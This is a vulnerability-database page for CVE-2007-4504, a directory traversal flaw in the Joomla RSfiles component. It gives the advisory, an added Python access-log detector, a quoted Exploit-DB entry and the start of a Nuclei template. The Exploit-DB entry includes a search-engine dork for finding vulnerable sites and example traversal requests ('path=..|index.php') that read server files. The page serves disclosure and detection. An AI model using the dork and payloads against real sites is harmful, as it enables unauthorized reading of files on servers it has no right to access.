CVE-2007-4504
Published 2007-08-23
Priority: P434 · medium · 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 9.49% (94.8th percentile)
Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | rsfiles | <= 1.0.2 | — |
No detection rules found.
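The request pattern in the description (a `..` in the `path` parameter of a `files.display` action of `com_rsfiles`) can be looked for in web server access logs. The following Python check is an added example, not part of the original page or any project's own rule; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded '..' is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_rsfiles_traversal(url):
    """True for a com_rsfiles files.display request whose 'path' parameter
    contains '..' after decoding, whatever separator follows it."""
    params = parse_qs(url.partition("?")[2], keep_blank_values=True)
    option = [v.lower() for v in params.get("option", [])]
    task = [v.lower() for v in params.get("task", [])]
    if "com_rsfiles" not in option or "files.display" not in task:
        return False
    return any(".." in fully_decode(p) for p in params.get("path", []))

def scan(log_lines):
    """Return (line_number, url) for every matching request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match and is_rsfiles_traversal(match.group(1)):
            hits.append((number, match.group(1)))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_rsfiles&task=files.display&path=docs HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET //index.php?option=com_rsfiles&task=files.display&path=..|index.php HTTP/1.1" 200 9120',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_rsfiles&task=files.display&path=%252e%252e|index.php HTTP/1.1" 200 9120',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_content&path=..|index.php HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, url in scan(SAMPLE_LOG):
        print(f"line {number}: possible CVE-2007-4504 request: {url}")
```

The check matches on `..` alone rather than `../`, because the advisory's own examples use `|` after the dots.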
Exploit-DB
Joomla! Component RSfiles 1.0.2 - 'path' File Download
exploitdb·2007-08-23
CVE-2007-4504 Joomla! Component RSfiles 1.0.2 - 'path' File Download
---
# Title : Joomla Component RSfiles <= 1.0.2 (path) Remote File Download Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.rsjoomla.com
# $$ : 10 $
# Dork : inurl:"/index.php?option=com_rsfiles"
# DorkEx : http://www.google.com.tr/search?hl=tr&q=inurl%3A%22%2Findex.php%3Foption%3Dcom_rsfiles%22&btnG=Ara&meta=
[[Remote File]]]---------------------------------------------------------
http://[target]/[path]//index.php?option=com_rsfiles&task=files.display&path=[File]
Example:
//index.php?option=com_rsfiles&task=files.display&path=..|index.php
//index.php?option=com_rsfiles&task=files.display&path=..|..| etc..
[[/Remote File]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-08
Nuclei
Joomla! RSfiles <=1.0.2 - Local File Inclusion
nuclei·CVSS 5.0
CVE-2007-4504 [MEDIUM] Joomla! RSfiles <=1.0.2 - Local File Inclusion
Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
Template:
```yaml
id: CVE-2007-4504

info:
  name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files
```